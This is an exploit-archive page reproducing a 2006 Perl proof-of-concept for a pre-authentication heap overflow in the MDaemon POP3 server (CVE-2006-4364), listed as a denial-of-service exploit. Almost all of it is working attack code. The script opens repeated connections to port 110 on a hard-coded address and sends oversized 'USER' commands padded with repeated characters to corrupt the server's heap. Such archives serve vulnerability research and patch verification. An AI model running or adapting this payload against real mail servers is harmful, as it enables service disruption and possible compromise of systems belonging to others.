[] NeoSense
E X P L O I T S
title author type platform port cve id

MDaemon POP3 Server < 9.06 - 'USER' Remote Buffer Overflow (PoC)

Author: Leon Juranic
type: dos
platform: windows
port: 
date_added: 2006-08-21 
date_updated:  
verified: 1 
codes: OSVDB-28125;CVE-2006-4364 
tags: 
aliases:  
screenshot_url:  
application_url: 
#
# PoC for Mdaemon POP3 preauth heap overflow
#
# Coded by Leon Juranic <leon.juranic@infigo.hr>
# Infigo IS <http://www.infigo.hr>
#
#

$host = '192.168.0.105';

use IO::Socket;

for ($x = 0 ; $x < 12 ; $x++)
{
	$sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto => 'tcp')
	|| die "socket error\n\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "USER " . "\@A" x 160 . "\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "QUIT\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	close ($sock);
	sleep(1);
}
	$sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto => 'tcp')
	|| die "socket error\n\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "USER " . "\@A\@A" . "B" x 326 . "\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "USER " . "\'A" x  337 . "\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	sleep(2);

# milw0rm.com [2006-08-22]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.